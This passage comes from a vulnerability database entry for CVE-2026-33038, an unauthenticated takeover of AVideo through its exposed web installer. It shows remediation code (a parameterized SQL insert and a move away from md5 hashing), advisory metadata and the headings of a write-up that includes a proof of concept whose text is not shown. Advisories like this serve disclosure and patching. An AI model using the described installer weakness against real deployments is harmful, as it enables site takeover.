needed\n\n1. **Parameterize SQL queries** on line 120 to prevent SQL injection:\n```php\n$stmt = $mysqli-\u003eprepare(\"INSERT INTO users (id, user, email, password, created, modified, isAdmin) VALUES (1, \u0027admin\u0027, ?, ?, now(), now(), true)\");\n$hashedPass = md5($_POST[\u0027systemAdminPass\u0027]); // Also: upgrade from md5 to password_hash()\n$stmt-\u003ebind_param(\"ss\", $_POST[\u0027contactEmail\u0027], $hashedPass);\n$stmt-\u003eexecute();\n```\n\n2. **Upgrade password hashing** from `md5()` to `password_hash()` with `PASSWORD_BCRYPT` or `PASSWORD_ARGON2ID`.\n\n## Credit\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).",
  "id": "GHSA-2f9h-23f7-8gcx",
  "modified": "2026-03-20T21:22:32Z",
  "published": "2026-03-17T19:46:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-2f9h-23f7-8gcx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33038"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/b3fa7869dcb935c8ab5c001a88dc29d2f92cf8e1"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "AVideo affected by unauthenticated application takeover via exposed web installer on uninitialized deployments"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33038 (GCVE-0-2026-33038)

FKIE_CVE-2026-33038

GHSA-2F9H-23F7-8GCX

Summary

Affected Component

Description

No authentication or access restriction on installer endpoint

Attacker-controlled database host eliminates credential guessing

Admin account creation with unsanitized input

Configuration file written with attacker-controlled values

Inconsistent defense: CLI installer is protected, web endpoint is not

No web server protection on install directory

Execution chain

Proof of Concept

Impact

Recommended Remediation

Option 1: Add a one-time setup token (preferred)

Option 2: Restrict installer to localhost/CLI only

Additional fixes needed

Credit

Tags

Sightings

Nomenclature